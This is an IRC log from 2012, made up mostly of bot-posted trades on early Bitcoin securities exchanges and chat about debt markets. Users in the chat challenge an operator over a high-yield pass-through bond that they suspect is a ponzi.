read from them Sep 12 23:12:54 there's a funny ? ? ? profit joke in there too Sep 12 23:13:01 btw Sep 12 23:13:08 why the fuck is it every major css thing sucks Sep 12 23:13:11 its insane Sep 12 23:14:02 [GLBSE] [GMVT-BOT] 10 @ 0.1399 = 1.399 BTC [-] Sep 12 23:16:36 [GLBSE] [BLUECHIP] 30 @ 0.1 = 3 BTC Sep 12 23:18:02 [GLBSE] [FPGA.CONTRACT] 2 @ 0.069 = 0.138 BTC [-] Sep 12 23:20:57 [GLBSE:OBSI.HRPT] [Bid: 0.094] [Ask: 0.09999997] [Spread: 0.00599997] [Last: 0.09999999] [24hVol: 500.05041498] [7dAvg: 0.09897859] Sep 12 23:28:44 [GLBSE] [KRAKEN] 1 @ 0.00999999 BTC [+] Sep 12 23:35:03 [MPEX] [S.MPOE] 12602 @ 0.00040005 = 5.0414 BTC [+] Sep 12 23:35:04 [MPEX] [S.MPOE] 24000 @ 0.0003962 = 9.5088 BTC [-] Sep 12 23:35:05 [MPEX] [S.MPOE] 13998 @ 0.00039613 = 5.545 BTC [-] Sep 12 23:36:49 [GLBSE] [FOO.PPPPT] 15 @ 0.03 = 0.45 BTC [-] Sep 12 23:36:51 [GLBSE] [FOO.PPPPT] 1 @ 0.03 BTC [-] Sep 12 23:40:20 [GLBSE] [NYAN.B] 1 @ 0.99 BTC [+] Sep 12 23:44:31 [GLBSE] [OBSI.HRPT] 37 @ 0.09999991 = 3.7 BTC [-] Sep 12 23:44:52 [GLBSE] [GSDPT] 7 @ 0.0034 = 0.0238 BTC [+] Sep 12 23:50:00 !ticker ASICMINER Sep 12 23:50:04 [GLBSE:ASICMINER] [Bid: 0.1004] [Ask: 0.10399] [Spread: 0.00359] [Last: 0.10399] [24hVol: 76.70169334] [7dAvg: 0.10965608] Sep 12 23:52:52 [GLBSE] [OBSI.HRPT] 4 @ 0.09999989 = 0.4 BTC [-] Sep 12 23:55:17 [GLBSE] [OBSI.HRPT] 19 @ 0.099 = 1.881 BTC [-] Sep 12 23:59:32 [GLBSE] [ARS] 15 @ 0.0155 = 0.2325 BTC [+] Sep 13 00:00:00 [GLBSE] [OBSI.HRPT] 8 @ 0.099 = 0.792 BTC [-] Sep 13 00:01:05 [GLBSE] [ARS] 55 @ 0.015 = 0.825 BTC [-] Sep 13 00:01:58 [GLBSE] [ARS] 30 @ 0.0149 = 0.447 BTC [-] Sep 13 00:02:00 [GLBSE] [OBSI.HRPT] 1 @ 0.09899998 BTC [-] Sep 13 00:02:29 [GLBSE] [ARS] 65 @ 0.0148 = 0.962 BTC [-] Sep 13 00:03:02 [MPEX] [S.MPOE] 10100 @ 0.00040034 = 4.0434 BTC [+] Sep 13 00:03:03 [MPEX] [S.MPOE] 16900 @ 0.00040116 = 6.7796 BTC [+] Sep 13 00:03:04 [GLBSE] [ARS] 200 @ 0.0147 = 2.94 BTC [-] Sep 13 00:08:51 [GLBSE] [FDBF] 1 @ 0.15 BTC [+] Sep 13 00:08:54 [GLBSE] [OBSI.HRPT] 1 @ 0.09899996 BTC [-] Sep 13 00:11:29 "If you think over 1000BTC is a small amount, why don't you just buy my debt off and I'll shut up, and at the same time, I'll praise you as lord." Sep 13 00:12:03 quote of the day, week, year... if anyone ever wonders why there's so many rabid people in btc... well, it's cause someone bought them lunch sometime. or a pair of shoes. Sep 13 00:12:34 bitcoin needs a debt exchange Sep 13 00:13:07 [GLBSE] [OBSI.HRPT] 1 @ 0.09879999 BTC [-] Sep 13 00:13:27 it kinda has one. people have been using their mpex holdings to back claims, do repos etc. Sep 13 00:13:28 chmod755, debt is typically traded otc Sep 13 00:13:45 bitcoin has one, the only thing is that it can not (nor should it work) without gpg and a few other tidbits. Sep 13 00:14:10 so in short, bitcoin needs fewer people that imagine they are part of it without being in fact involved. Sep 13 00:15:02 who are you dissing again here sorry lost track Sep 13 00:15:11 i don't think bitcoin is mature enough to standardize debt contracts on an exchange Sep 13 00:15:22 Lyspooner nah it'd all be otc for a while yet. Sep 13 00:16:04 right Sep 13 00:16:31 arguably debt negotiation should be otc anyway. Sep 13 00:16:54 bitcoin debt obligations are so person-to-person specific that i doubt a single entity could profitably run a clearing business Sep 13 00:17:16 or a debt exchange Sep 13 00:18:00 just look at the number of successful bitcoin escrow services, for example Sep 13 00:18:05 might be possible, but we're still a few steps removed from it i think Sep 13 00:18:08 in due time, as they say. Sep 13 00:18:30 yes, of course Sep 13 00:18:38 i'd say 4 years Sep 13 00:18:59 who knows... Sep 13 00:19:18 mpoe will probably run away with deposits between now and 2016 :) Sep 13 00:19:31 so who can we trust Sep 13 00:20:05 lmao Sep 13 00:20:12 how do you figure ? Sep 13 00:20:22 [GLBSE] [OBSI.HRPT] 44 @ 0.09879999 = 4.3472 BTC [-] Sep 13 00:20:24 [GLBSE] [OBSI.HRPT] 20 @ 0.0988 = 1.976 BTC [+] Sep 13 00:20:26 [GLBSE] [OBSI.HRPT] 93 @ 0.09899995 = 9.207 BTC [+] Sep 13 00:20:27 [GLBSE] [OBSI.HRPT] 34 @ 0.09899999 = 3.366 BTC [+] Sep 13 00:20:28 [GLBSE] [OBSI.HRPT] 12 @ 0.099 = 1.188 BTC [+] Sep 13 00:20:45 [GLBSE] [PUREMINING] 1 @ 0.0976 BTC [-] Sep 13 00:21:00 i don't figure this Sep 13 00:21:35 it's just been reasonably tough to trust any business to store bitcoin deposits Sep 13 00:21:50 so how can we start a debt exchange Sep 13 00:22:26 so mpoe/mpes has been around for something like 14 months now, Sep 13 00:22:27 your company seems to do well at it Sep 13 00:22:30 and i see you give it till 2016 Sep 13 00:22:36 i guess by 2016 it will be 2050 ? Sep 13 00:23:47 i think it will be around for longer than 2050 if the people who run it are like you Sep 13 00:24:01 well they'd better be lol. Sep 13 00:24:03 [GLBSE] [PUREMINING] 1 @ 0.0976 BTC [-] Sep 13 00:24:20 i swear that MPOE PR person on the forums is you Sep 13 00:24:26 really ? Sep 13 00:24:28 yep Sep 13 00:25:00 you're both so very upettable Sep 13 00:25:01 nice compliment she says :D Sep 13 00:25:04 upsettable Sep 13 00:25:17 oh you must be married or related or something? Sep 13 00:25:44 neither, no. i'm single. Sep 13 00:26:07 well, dinner parties with you two (or you one) must be frightening if you arrive at the door with an opinion Sep 13 00:26:21 :) Sep 13 00:26:30 :D Sep 13 00:27:03 you know actually, erlier this week we were having dinner in this one place where previous we were with a third party who Sep 13 00:27:15 wanted to know if we're married ; related ; declared this is fucking scary. Sep 13 00:27:17 so... yeah. Sep 13 00:28:33 sounds about right Sep 13 00:29:33 and also she's tall. so you'd better not be short either. Sep 13 00:29:46 fuck the short Sep 13 00:29:49 haha Sep 13 00:30:15 you pay her in coin? Sep 13 00:30:41 [GLBSE] [OBSI.HRPT] 5 @ 0.097 = 0.485 BTC [-] Sep 13 00:30:42 [GLBSE] [OBSI.HRPT] 1 @ 0.09699998 BTC [-] Sep 13 00:30:44 [GLBSE] [OBSI.HRPT] 1 @ 0.0951 BTC [-] Sep 13 00:30:45 [GLBSE] [OBSI.HRPT] 5 @ 0.094 = 0.47 BTC [-] Sep 13 00:30:46 [GLBSE] [OBSI.HRPT] 5 @ 0.0925 = 0.4625 BTC [-] Sep 13 00:30:47 [GLBSE] [OBSI.HRPT] 1 @ 0.0901 BTC [-] Sep 13 00:30:48 [GLBSE] [OBSI.HRPT] 12 @ 0.09 = 1.08 BTC [-] Sep 13 00:31:03 [MPEX] [S.MPOE] 23502 @ 0.00039613 = 9.3098 BTC [-] Sep 13 00:31:04 [MPEX] [S.MPOE] 4335 @ 0.0003953 = 1.7136 BTC [-] Sep 13 00:31:50 [GLBSE] [KRAKEN] 500 @ 0.00999999 = 5 BTC [+] Sep 13 00:38:05 [GLBSE] [TYGRR.BOND-P] 20 @ 0.0212 = 0.424 BTC [-] Sep 13 00:42:04 [GLBSE] [OBSI.HRPT] 8 @ 0.09 = 0.72 BTC [-] Sep 13 00:42:05 [GLBSE] [OBSI.HRPT] 1 @ 0.08400002 BTC [-] Sep 13 00:42:05 [GLBSE] [OBSI.HRPT] 1 @ 0.084 BTC [-] Sep 13 00:42:06 [GLBSE] [OBSI.HRPT] 11 @ 0.08310004 = 0.9141 BTC [-] Sep 13 00:42:08 [GLBSE] [OBSI.HRPT] 5 @ 0.08310003 = 0.4155 BTC [-] Sep 13 00:42:09 [GLBSE] [OBSI.HRPT] 15 @ 0.08310003 = 1.2465 BTC [-] Sep 13 00:42:10 [GLBSE] [OBSI.HRPT] 10 @ 0.08310002 = 0.831 BTC [-] Sep 13 00:42:11 [GLBSE] [OBSI.HRPT] 15 @ 0.08310001 = 1.2465 BTC [-] Sep 13 00:42:13 [GLBSE] [OBSI.HRPT] 9 @ 0.0831 = 0.7479 BTC [-] Sep 13 00:42:14 [GLBSE] [OBSI.HRPT] 11 @ 0.08300004 = 0.913 BTC [-] Sep 13 00:42:14 [GLBSE] [OBSI.HRPT] 5 @ 0.08300003 = 0.415 BTC [-] Sep 13 00:42:15 [GLBSE] [OBSI.HRPT] 25 @ 0.08300002 = 2.075 BTC [-] Sep 13 00:42:16 [GLBSE] [OBSI.HRPT] 25 @ 0.08300001 = 2.075 BTC [-] Sep 13 00:42:17 [GLBSE] [OBSI.HRPT] 4 @ 0.08100001 = 0.324 BTC [-] Sep 13 00:42:18 [GLBSE] [OBSI.HRPT] 1 @ 0.08000001 BTC [-] Sep 13 00:42:19 [GLBSE] [OBSI.HRPT] 54 @ 0.08 = 4.32 BTC [-] Sep 13 00:43:20 [GLBSE] [OBSI.HRPT] 43 @ 0.08000001 = 3.44 BTC [+] Sep 13 00:43:22 [GLBSE] [OBSI.HRPT] 46 @ 0.08 = 3.68 BTC [-] Sep 13 00:43:23 [GLBSE] [OBSI.HRPT] 30 @ 0.08 = 2.4 BTC [-] Sep 13 00:43:24 [GLBSE] [OBSI.HRPT] 49 @ 0.07910001 = 3.8759 BTC [-] Sep 13 00:43:26 [GLBSE] [OBSI.HRPT] 99 @ 0.0791 = 7.8309 BTC [-] Sep 13 00:43:26 [GLBSE] [OBSI.HRPT] 49 @ 0.07010001 = 3.4349 BTC [-] Sep 13 00:43:27 [GLBSE] [OBSI.HRPT] 99 @ 0.0701 = 6.9399 BTC [-] Sep 13 00:43:28 [GLBSE] [OBSI.HRPT] 50 @ 0.07000002 = 3.5 BTC [-] Sep 13 00:43:29 [GLBSE] [OBSI.HRPT] 35 @ 0.07000001 = 2.45 BTC [-] Sep 13 00:43:30 [GLBSE] [BITSPLIT.MINING.1TH] 8 @ 0.033 = 0.264 BTC Sep 13 00:43:48 i was gonna wow, but then i added up the 20 btc. Sep 13 00:44:38 [GLBSE] [OBSI.HRPT] 3 @ 0.07000002 = 0.21 BTC [+] Sep 13 00:44:39 [GLBSE] [OBSI.HRPT] 65 @ 0.07000001 = 4.55 BTC [-] Sep 13 00:44:40 [GLBSE] [OBSI.HRPT] 50 @ 0.07000001 = 3.5 BTC [-] Sep 13 00:44:41 [GLBSE] [OBSI.HRPT] 100 @ 0.07 = 7 BTC [-] Sep 13 00:44:43 [GLBSE] [OBSI.HRPT] 99 @ 0.06 = 5.94 BTC [-] Sep 13 00:45:49 If they take out 0.05 I will wow Sep 13 00:53:12 major obsi dump Sep 13 00:53:57 [GLBSE] [TEEK.B] 1 @ 0.265 BTC [+] Sep 13 00:53:59 [GLBSE] [TEEK.B] 12 @ 0.26 = 3.12 BTC [-] Sep 13 00:55:01 [GLBSE] [JAH] 9 @ 0.131 = 1.179 BTC [-] Sep 13 00:56:14 [MPEX] [S.MPOE] 27457 @ 0.00039503 = 10.8463 BTC [-] Sep 13 00:57:56 [GLBSE] [FOO.PPPPT] 20 @ 0.032 = 0.64 BTC [+] Sep 13 01:02:03 wow TEEK.B took a nosedive Sep 13 01:11:35 [GLBSE] [FDBF] 132 @ 0.15 = 19.8 BTC [+] Sep 13 01:11:37 [GLBSE] [FDBF] 68 @ 0.15 = 10.2 BTC [+] Sep 13 01:13:49 [GLBSE] [PPT.A] 3 @ 0.32 = 0.96 BTC [-] Sep 13 01:19:41 !ticker FDBF Sep 13 01:19:42 [GLBSE:FDBF] [Bid: 0.145] [Ask: 0.15] [Spread: 0.005] [Last: 0.15] [24hVol: 39.15] [7dAvg: 0.14999999] Sep 13 01:22:03 [MPEX] [S.MPOE] 26400 @ 0.00039733 = 10.4895 BTC [+] Sep 13 01:25:59 [GLBSE] [ASICMINER] 10 @ 0.103887 = 1.0389 BTC [-] Sep 13 01:26:03 [GLBSE] [JTME] 1 @ 0.81 BTC [-] Sep 13 01:31:35 [GLBSE] [SILVER] 41 @ 0.00920001 = 0.3772 BTC [-] Sep 13 01:31:36 [GLBSE] [SILVER] 2 @ 0.0092 = 0.0184 BTC [-] Sep 13 01:31:38 [GLBSE] [SILVER] 3 @ 0.00915 = 0.0275 BTC [-] Sep 13 01:31:39 [GLBSE] [SILVER] 54 @ 0.00910002 = 0.4914 BTC [-] Sep 13 01:33:00 [GLBSE] [ASICMINER] 65 @ 0.1025 = 6.6625 BTC [-] Sep 13 01:35:03 [MPEX] [S.DICE] 5800 @ 0.0034 = 19.72 BTC [+] Sep 13 01:36:02 [MPEX] [F.GIGA.ETF] 21800 @ 0.00040346 = 8.7954 BTC [-] Sep 13 01:36:04 [MPEX] [F.GIGA.ETF] 28200 @ 0.00039487 = 11.1353 BTC [-] **** BEGIN LOGGING AT Thu Sep 13 08:07:04 2012 Sep 13 08:11:09 [GLBSE] [ASICMINER] 10 @ 0.104 = 1.04 BTC [+] Sep 13 08:28:02 [MPEX] [S.MPOE] 25465 @ 0.0003936 = 10.023 BTC [-] Sep 13 08:28:03 [MPEX] [S.MPOE] 23535 @ 0.00039357 = 9.2627 BTC [-] Sep 13 08:34:29 [GLBSE] [TYGRR.BOND-B] 1 @ 0.1 BTC [-] Sep 13 08:34:30 [GLBSE] [TYGRR.BOND-B] 5 @ 0.10029999 = 0.5015 BTC [+] Sep 13 08:50:52 [GLBSE] [ASICMINER] 1 @ 0.10439 BTC [+] Sep 13 08:56:03 [MPEX] [S.MPOE] 4365 @ 0.00039357 = 1.7179 BTC [-] Sep 13 08:56:04 [MPEX] [S.MPOE] 5200 @ 0.00039352 = 2.0463 BTC [-] Sep 13 08:56:05 [MPEX] [S.MPOE] 33900 @ 0.00039337 = 13.3352 BTC [-] Sep 13 08:56:06 [MPEX] [S.MPOE] 10130 @ 0.0003932 = 3.9831 BTC [-] Sep 13 08:57:05 [GLBSE] [GSDPT] 135 @ 0.0034 = 0.459 BTC [+] Sep 13 08:59:20 [GLBSE] [ASICMINER] 57 @ 0.10439 = 5.9502 BTC [+] Sep 13 08:59:22 [GLBSE] [ASICMINER] 184 @ 0.10449 = 19.2262 BTC [+] Sep 13 08:59:22 [GLBSE] [ASICMINER] 10 @ 0.1045 = 1.045 BTC [+] Sep 13 08:59:23 [GLBSE] [ASICMINER] 112 @ 0.1046 = 11.7152 BTC [+] Sep 13 09:00:23 [GLBSE] [ASICMINER] 160 @ 0.105 = 16.8 BTC [+] Sep 13 09:00:44 [GLBSE] [ASICMINER] 1 @ 0.1049 BTC [-] Sep 13 09:00:45 [GLBSE] [ASICMINER] 4 @ 0.105 = 0.42 BTC [+] Sep 13 09:16:33 [GLBSE] [OBSI.HRPT] 1 @ 0.0891 BTC [+] Sep 13 09:21:39 [MPEX] [S.BVPS] 505 @ 0.00337901 = 1.7064 BTC [-] Sep 13 09:41:44 [GLBSE] [FUTUREFUND] 7 @ 0.0001268 = 0.0009 BTC [+] Sep 13 09:49:14 [GLBSE] [FDBF] 1 @ 0.15 BTC [+] Sep 13 09:52:03 [MPEX] [S.MPOE] 16200 @ 0.0003932 = 6.3698 BTC [-] Sep 13 10:10:48 [GLBSE] [YARR] 20 @ 1 = 20 BTC [-] Sep 13 10:18:04 [MPEX] [S.MPOE] 12000 @ 0.0003932 = 4.7184 BTC [-] Sep 13 10:20:09 [GLBSE] [BFLS.RIG] 1 @ 0.979 BTC [-] Sep 13 10:20:10 [GLBSE] [BFLS.RIG] 1 @ 0.98 BTC [+] Sep 13 10:20:12 [GLBSE] [BFLS.RIG] 5 @ 0.983 = 4.915 BTC [+] Sep 13 10:20:13 [GLBSE] [BFLS.RIG] 4 @ 0.985 = 3.94 BTC [+] Sep 13 10:20:13 [GLBSE] [BFLS.RIG] 4 @ 0.989 = 3.956 BTC [+] Sep 13 10:36:17 :-/ Sep 13 10:44:03 [MPEX] [S.MPOE] 8906 @ 0.0003932 = 3.5018 BTC [-] Sep 13 10:44:04 [MPEX] [S.MPOE] 52653 @ 0.00039318 = 20.7021 BTC [-] Sep 13 10:44:06 [MPEX] [S.MPOE] 1541 @ 0.00039308 = 0.6057 BTC [-] Sep 13 10:44:46 [GLBSE] [OBSI.HRPT] 1 @ 0.0890001 BTC [-] Sep 13 10:44:47 [GLBSE] [OBSI.HRPT] 20 @ 0.089099 = 1.782 BTC [+] Sep 13 10:44:48 [GLBSE] [OBSI.HRPT] 1 @ 0.0891 BTC [+] Sep 13 10:44:49 [GLBSE] [OBSI.HRPT] 1 @ 0.0892 BTC [+] Sep 13 10:44:51 [GLBSE] [OBSI.HRPT] 5 @ 0.0892 = 0.446 BTC [+] Sep 13 10:44:52 [GLBSE] [OBSI.HRPT] 3 @ 0.0893 = 0.2679 BTC [+] Sep 13 10:44:53 [GLBSE] [OBSI.HRPT] 2 @ 0.0894 = 0.1788 BTC [+] Sep 13 10:47:47 [GLBSE] [KRAKEN] 1080 @ 0.00999999 = 10.8 BTC [+] Sep 13 10:48:44 [GLBSE] [OBSI.HRPT] 7 @ 0.0894 = 0.6258 BTC [+] Sep 13 10:48:46 [GLBSE] [OBSI.HRPT] 38 @ 0.09469989 = 3.5986 BTC [+] Sep 13 10:51:55 [GLBSE] [FUTUREFUND] 4 @ 0.0001268 = 0.0005 BTC [+] Sep 13 10:52:54 [GLBSE] [ASICMINER] 3 @ 0.105 = 0.315 BTC [+] Sep 13 11:04:27 Obsi locked his ponzi thread Sep 13 11:10:27 no Sep 13 11:10:53 but I suspect it is because many are starting to ask him questions he does not want to answer Sep 13 11:12:01 [MPEX] [F.GIGA.ETF] 26661 @ 0.00041263 = 11.0011 BTC [+] Sep 13 11:15:07 [GLBSE] [OBSI.HRPT] 1 @ 0.0946 BTC [-] Sep 13 11:16:49 Topic was locked while I investigated a threat from someone Sep 13 11:16:56 should be unlocked now Sep 13 11:17:14 Obsi: care to answer anyone's questions about your business model? Sep 13 11:17:56 Obsi: or refute my claims that you can just take investors' money within the terms of your contract? Sep 13 11:18:31 my business model is I transfer funds to a person that earns high rate interest and pay that out as coupons Sep 13 11:18:46 I am not selling any right now Sep 13 11:19:14 I sold all that I held in my personal account a few hours ago and I only sell from the OBSI.HRPT on Sundays Sep 13 11:19:26 Not me Sep 13 11:19:49 Obsi: but you could claim at any time that this "person" has defaulted and not repay investors, and this would be within your contract Sep 13 11:19:55 and there would be no accountability Sep 13 11:20:02 That's the day I run reports, no sale this Sunday though due to crazy market Sep 13 11:20:24 dust-otc: I could... but I'm not like that Sep 13 11:21:00 your operation is quite similar to pirate, except if you didn't pay back you wouldn't even be a scammer Sep 13 11:21:10 becaue it is laid out in the contract Sep 13 11:21:15 Well who wants to be a scammer? Sep 13 11:21:29 lol :) Sep 13 11:21:52 I have zero control over this business... it's a passthrough, I'm not going to try and protect them in the contract at the expense of myself. Sep 13 11:23:27 In the event of a failure I would notify everyone in the thread ASAP since I could not continue payments beyond the buffer, which stands at ~10-11 days right now Sep 13 11:23:34 Obsi: but the failure of the business you are passing through to is indistinguishable from you running with everyones' money Sep 13 11:24:12 Well people can claim that, but I will still be here running my personal securities Sep 13 11:27:21 Frankly I don't enjoy running HRPT very much, as it has exposed me to even more personal attacks like the one that caused me to lock the thread. Sep 13 11:28:19 I was at 12% of my portfolio in high risk investments Sep 13 11:28:47 pirate... Sep 13 11:28:49 I limit it to 10%, my wife would kill me if I left it like that Sep 13 11:29:47 I get more than 1% a day on the backend, but I don't exceed 10% for very long as a rule. Sep 13 11:30:24 what kind of business needs to borrow capital at over 1% a day? Sep 13 11:31:02 an expanding high-interest loan & debt buying organization Sep 13 11:31:13 pretty sure that's in the thread Sep 13 11:31:49 why would they not borrow at 1%/week .. or 1%/month? Sep 13 11:32:04 ugh Sep 13 11:32:04 They already have Sep 13 11:32:10 so this is mystery passthrough ? Sep 13 11:32:20 and the thread says "in the financial sector and currently expanding" Sep 13 11:32:28 loan & debt buying is news to me Sep 13 11:32:32 in a later post Sep 13 11:32:48 ah Sep 13 11:33:33 they offer their employees a chance to earn while bootstrapping a new location... lasts 4-6 months usually... got maybe 2 more months at this one Sep 13 11:34:19 most of the employees max their CC's and get family loans to do it, I know an employee that does passthrough for me Sep 13 11:34:48 US Sep 13 11:35:31 [GLBSE] [RSM] 40 @ 0.3 = 12 BTC [+] Sep 13 11:37:13 Obsi: why not reveal the name of the business if it is in the US Sep 13 11:37:24 and let investors decide for themselves if it is legit? Sep 13 11:37:47 Because they'll just end-run around me and invest themselves with some employee Sep 13 11:37:59 [MPEX] [F.GIGA.ETF] 19733 @ 0.00041263 = 8.1424 BTC [+] Sep 13 11:38:00 [MPEX] [F.GIGA.ETF] 5367 @ 0.00041292 = 2.2161 BTC [+] Sep 13 11:38:38 I agree... it usually leaves people worse off Sep 13 11:39:27 I've had family harmed by payday loans, but I think everyone should be allowed to run their life as they see fit. Sometimes that comes with painful learning experiences Sep 13 11:42:12 The bulk debt buys can be excellent earners as well, I have thought of getting into it myself but it seems very hit & miss. Sep 13 11:43:44 well if the person is deemed not mentally fit enough to run their own life, then perhaps they should have assistance. Sep 13 11:44:17 That may apply to many in the bitcoin community now that I think of it Sep 13 11:45:15 perhaps usagi can start a fund to insure idiots? Sep 13 11:45:58 [GLBSE] [FUTUREFUND] 1 @ 0.0001268 BTC [+] Sep 13 11:48:43 I always expect to get scammed, that's why I stick to my limits and diversify. I recommend the same to everyone else. Sep 13 11:49:34 No, I bought this morning Sep 13 11:50:04 when I saw it fall I started buying cheap Sep 13 11:51:47 [GLBSE] [MOORE] 2 @ 0.4945 = 0.989 BTC [-] Sep 13 11:51:48 [GLBSE] [MOORE] 26 @ 0.495 = 12.87 BTC [+] Sep 13 11:52:07 then I sold once some stability had returned... I don't usually hold OBSI.HRPT as I make money on the backend. Sep 13 12:04:02 [MPEX] [S.MPOE] 20400 @ 0.00039415 = 8.0407 BTC [+] Sep 13 12:06:14 [GLBSE] [ASICMINER] 20 @ 0.105 = 2.1 BTC [+] Sep 13 12:27:01 [MPEX] [S.DICE] 300 @ 0.003325 = 0.9975 BTC [-] Sep 13 12:31:01 [GLBSE] [OBSI.HRPT] 10 @ 0.09449999 = 0.945 BTC [-] Sep 13 12:37:06 [GLBSE] [FPGAMINING] 2 @ 0.732 = 1.464 BTC [+] Sep 13 12:50:43 [GLBSE] [ASICMINER] 160 @ 0.105 = 16.8 BTC [+] Sep 13 12:54:52 [MPEX] [F.GIGA.ETF] 11030 @ 0.00041071 = 4.5301 BTC [-] Sep 13 12:56:15 !pl [@] [] Sep 13 12:56:23 Requesting data from GLBSE (might take a while, also might return fishy results as it does not account for splits etc). Sep 13 12:56:28 OBSI.HRPT [1@0.1BTC] paid: 0.058745 BTC. Last price: 0.09449999 BTC. Capital gain: -0.00550001 BTC. Total: 0.05324499 BTC. (53.2%) Sep 13 13:01:50 [GLBSE] [OBSI.HRPT] 4 @ 0.09399999 = 0.376 BTC [-] Sep 13 13:01:52 [GLBSE] [OBSI.HRPT] 5 @ 0.094 = 0.47 BTC [+] Sep 13 13:01:53 [GLBSE] [OBSI.HRPT] 11 @ 0.09439999 = 1.0384 BTC [+] Sep 13 13:06:27 [GLBSE] [FPGAMINING] 5 @ 0.7311 = 3.6555 BTC [-] Sep 13 13:06:28 [GLBSE] [FPGAMINING] 5 @ 0.731 = 3.655 BTC [-] Sep 13 13:06:30 [GLBSE] [FPGAMINING] 1 @ 0.7305 BTC [-] Sep 13 13:06:30 [GLBSE] [FPGAMINING] 2 @ 0.73 = 1.46 BTC [-] Sep 13 13:06:31 [GLBSE] [FPGAMINING] 10 @ 0.73 = 7.3 BTC [-] Sep 13 13:10:04 jcpham : you wanted a transcript ? http://polimedia.us/fain/activism/barbecuran-pe-trilema-un-blog-de-mircea-popescu-/#c108307 Sep 13 13:20:20 [GLBSE] [FPGAMINING] 2 @ 0.72 = 1.44 BTC [-] Sep 13 13:20:38 [GLBSE] [FPGAMINING] 10 @ 0.7 = 7 BTC [-] Sep 13 13:23:08 [GLBSE] [YABMC] 1 @ 0.1005 BTC [+] Sep 13 13:23:10 [GLBSE] [YABMC] 1 @ 0.1005 BTC [+] Sep 13 13:23:11 [GLBSE] [YABMC] 2 @ 0.10045 = 0.2009 BTC [-] Sep 13 13:23:12 [GLBSE] [YABMC] 22 @ 0.1004 = 2.2088 BTC [-] Sep 13 13:23:13 [GLBSE] [YABMC] 2 @ 0.1002 = 0.2004 BTC [-] Sep 13 13:23:14 [GLBSE] [YABMC] 2 @ 0.1 = 0.2 BTC [-] Sep 13 13:23:40 [GLBSE] [ASICMINER] 35 @ 0.105 = 3.675 BTC [+] Sep 13 13:24:02 [MPEX] [S.MPOE] 2600 @ 0.00039415 = 1.0248 BTC [+] Sep 13 13:27:15 [GLBSE] [BDT] 8 @ 0.8 = 6.4 BTC [-] Sep 13 13:37:14 [GLBSE] [PUREMINING] 3 @ 0.09445001 = 0.2834 BTC [-] Sep 13 13:37:15 [GLBSE] [PUREMINING] 8 @ 0.09445 = 0.7556 BTC [-] Sep 13 13:37:17 [GLBSE] [PUREMINING] 20 @ 0.0944 = 1.888 BTC [-] Sep 13 13:37:18 [GLBSE] [PUREMINING] 3 @ 0.0943 = 0.2829 BTC [-] Sep 13 13:37:19 [GLBSE] [PUREMINING] 123 @ 0.0941 = 11.5743 BTC [-] Sep 13 13:37:20 [GLBSE] [PUREMINING] 20 @ 0.094 = 1.88 BTC [-] Sep 13 13:39:27 [GLBSE] [LTC-MINING] 2 @ 0.55 = 1.1 BTC [-] Sep 13 13:39:29 [GLBSE] [LTC-MINING] 10 @ 0.53 = 5.3 BTC [-] Sep 13 13:39:29 [GLBSE] [LTC-MINING] 1 @ 0.51 BTC [-] Sep 13 13:50:02 [MPEX] [S.MPOE] 42600 @ 0.00039421 = 16.7933 BTC [+] Sep 13 13:52:01 [MPEX] [O.BTCUSD.P120T] 2 @ 0.17081312 = 0.3416 BTC [-] Sep 13 13:52:03 [MPEX] [O.BTCUSD.P120T] 470 @ 0.12033879 = 56.5592 BTC [-] Sep 13 13:54:01 [MPEX] [O.BTCUSD.P110T] 468 @ 0.07884613 = 36.9 BTC [-] Sep 13 13:54:50 [GLBSE] [JAH] 2 @ 0.135 = 0.27 BTC [+] Sep 13 14:00:15 :) Sep 13 14:09:35 [GLBSE] [OBSI.HRPT] 1 @ 0.0942 BTC [-] Sep 13 14:09:42 [GLBSE] [ASICMINER] 50 @ 0.105 = 5.25 BTC [+] Sep 13 14:14:55 [GLBSE] [OBSI.HRPT] 10 @ 0.09419999 = 0.942 BTC [-] Sep 13 14:19:07 [GLBSE] [ASICMINER] 39 @ 0.10185 = 3.9722 BTC [-] Sep 13 14:19:09 [GLBSE] [ASICMINER] 20 @ 0.10175 = 2.035 BTC [-] Sep 13 14:19:10 [GLBSE] [ASICMINER] 5 @ 0.1017 = 0.5085 BTC [-] Sep 13 14:19:11 [GLBSE] [ASICMINER] 1 @ 0.1016 BTC [-] Sep 13 14:19:13 [GLBSE] [ASICMINER] 6 @ 0.1016 = 0.6096 BTC [-] Sep 13 14:19:14 [GLBSE] [ASICMINER] 1 @ 0.10151 BTC [-] Sep 13 14:19:15 [GLBSE] [ASICMINER] 14 @ 0.1015001 = 1.421 BTC [-] Sep 13 14:19:44 [GLBSE] [OBSI.HRPT] 10 @ 0.09419999 = 0.942 BTC [-] Sep 13 14:20:03 [MPEX] [F.GIGA.ETF] 2470 @ 0.00041057 = 1.0141 BTC [-] Sep 13 14:20:03 [MPEX] [F.GIGA.ETF] 9030 @ 0.00041292 = 3.7287 BTC [+] Sep 13 14:20:15 hey usagi Sep 13 14:20:43 lol, i lurk here a bit Sep 13 14:20:55 [GLBSE] [RSM] 5 @ 0.3 = 1.5 BTC [+] Sep 13 14:21:06 [GLBSE] [OBSI.HRPT] 4 @ 0.09419999 = 0.3768 BTC [-] Sep 13 14:21:07 [GLBSE] [OBSI.HRPT] 2 @ 0.0942 = 0.1884 BTC [+] Sep 13 14:21:08 [GLBSE] [OBSI.HRPT] 4 @ 0.09429999 = 0.3772 BTC [+] Sep 13 14:22:18 how are the trolls on the forum treating you today? Sep 13 14:22:41 [GLBSE] [OBSI.HRPT] 22 @ 0.09429999 = 2.0746 BTC [+] Sep 13 14:22:43 [GLBSE] [OBSI.HRPT] 3 @ 0.0943 = 0.2829 BTC [+] Sep 13 14:24:43 [GLBSE] [OBSI.HRPT] 2 @ 0.0943 = 0.1886 BTC [+] Sep 13 14:24:44 [GLBSE] [OBSI.HRPT] 4 @ 0.09439999 = 0.3776 BTC [+] Sep 13 14:29:08 [GLBSE] [OBSI.HRPT] 26 @ 0.09439999 = 2.4544 BTC [+] Sep 13 14:29:10 [GLBSE] [OBSI.HRPT] 7 @ 0.0944 = 0.6608 BTC [+] Sep 13 14:29:11 [GLBSE] [OBSI.HRPT] 30 @ 0.09449999 = 2.835 BTC [+] Sep 13 14:29:41 [GLBSE] [ASICMINER] 280 @ 0.105 = 29.4 BTC [+] Sep 13 14:41:04 [GLBSE] [ASICMINER] 25 @ 0.104 = 2.6 BTC [-] Sep 13 14:42:48 [GLBSE] [ASICMINER] 20 @ 0.105 = 2.1 BTC [+] Sep 13 14:47:47 [GLBSE] [UDN] 4 @ 0.04000001 = 0.16 BTC [-] 